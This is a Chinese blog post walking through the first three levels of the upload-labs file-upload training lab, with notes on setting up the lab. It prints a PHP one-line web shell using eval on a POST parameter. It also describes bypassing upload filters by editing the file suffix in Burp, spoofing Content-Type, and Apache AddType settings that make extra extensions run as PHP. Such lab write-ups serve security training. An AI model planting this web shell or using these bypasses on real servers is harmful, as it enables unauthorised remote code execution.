热门标签
热门文章
- 12021年我推荐给你这些高质量计算机书籍_计算机数制与编码 书 推荐
- 2一文了解字节跳动如何解决 SLA 治理难题
- 3IDEA 远程调试(Remote)_idea remote
- 4elasticsearch 7.x 入门
- 5如何利用 Seaborn 实现高级统计图表
- 6ShowMeAI | 这是我们知道的,关于〖Suno 〗和〖AI音乐〗的一切_suno v1推出时间
- 7Verilog中begin···end语句执行顺序,阻塞赋值与非阻塞赋值,always和assign,wire和reg_begin end里的非阻塞赋值是顺序执行吗
- 8(睿抗)2021 RoboCom 世界机器人开发者大赛-本科组(初赛)_睿抗机器人开发者大赛(raicom)编程技能赛历届题目
- 9Qt调用百度AI接口--车牌识别_qt车牌识别
- 10权限管理和设置测试的测试点_项目测试点权限管理检查表怎么填
当前位置: article > 正文
upload-labs_upload-lab上传成功后现实空白
作者:很楠不爱3 | 2024-05-25 20:17:56
赞
踩
upload-lab上传成功后现实空白
环境安装 [小皮php+github源包]
github源包,打开安装错误
问题:卡顿
更改php版本 5.2.17
问题:还是跳转不出来,最后发现用 127.0.0.1成功显示
(无语啊! localhost怎么你了!!!)
蚁剑连接:返回数据为空:编码改为base64
开刷
pass-01
查看源码,发现是在前端做文件后缀的认证,生成一句话测试木马.php.jpg,用bp直接修改后缀,去掉.jpg,访问连接 /upload/xxx.php,上传成功。上传一句话木马.php.jpg,用蚁剑连接,在根目录找flag
- 一句话测试 : <?php phpinfo()?>
- 一句话木马 : <?php @eval($_POST['cmd'])?>
pass-02
源码看出是做文件名的校对,看到type
- 直接上传php文件
- 修改 Content-Type为 image/jpeg
pass-03
看源码 发现检测点:文件后缀,文件名修改
- 随机生成了文件名 rand(1000.9999)
- 在bp的response发现返回的文件路径
- 上传 <?php phpinfo() ?>的文件,但是无法成功显示,修改apache服务器
AddType application/x-httpd-php .php .php3 .php5 .pht
AddType application/x-php .php .php3 .php5 .pht
- 1
- 2
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/很楠不爱3/article/detail/623605
推荐阅读
相关标签
